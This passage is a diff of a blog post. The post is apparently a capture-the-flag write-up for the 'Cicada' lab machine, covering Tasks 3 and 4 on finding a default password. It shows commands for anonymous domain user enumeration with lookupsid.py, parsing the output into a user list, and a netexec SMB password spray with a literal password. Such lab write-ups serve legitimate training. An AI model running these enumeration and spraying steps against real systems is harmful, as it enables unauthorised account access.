danae-pan/Blog/my-blog/blog/Cicada.md

 Which user account is still using the company default password?

-To see the contents of the file found, we can transfer it to the host by running ``get "Notice from HR.txt".
+To see the contents of the file found, we can transfer it to the host by running ``get "Notice from HR``.txt".
 Opening it, we see a welcoming message to a new hire with the default password but it does not give a username

 ![alt text](image-ci-3.png)

 Then, we can try to enumerate domain users on the target IP and save them to a file by running ``lookupsid.py anonymous@<target_ip> > lookupsid_output.txt``.
 Then, we save the usernames cleanly we run ``grep '(SidTypeUser)' lookupsid_output.txt | awk -F '\\' '{print $2}' | cut -d' ' -f1 > users.txt``.
 Finally using the password found in the file, we can perform a password spray attack by running ``netexec smb <target_ip> -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'`` and find the username to be michael.wrightson.

 ![alt text](image-ci-5.png)
 ### Task 4

 Which user has left their password in Active Directory metadata?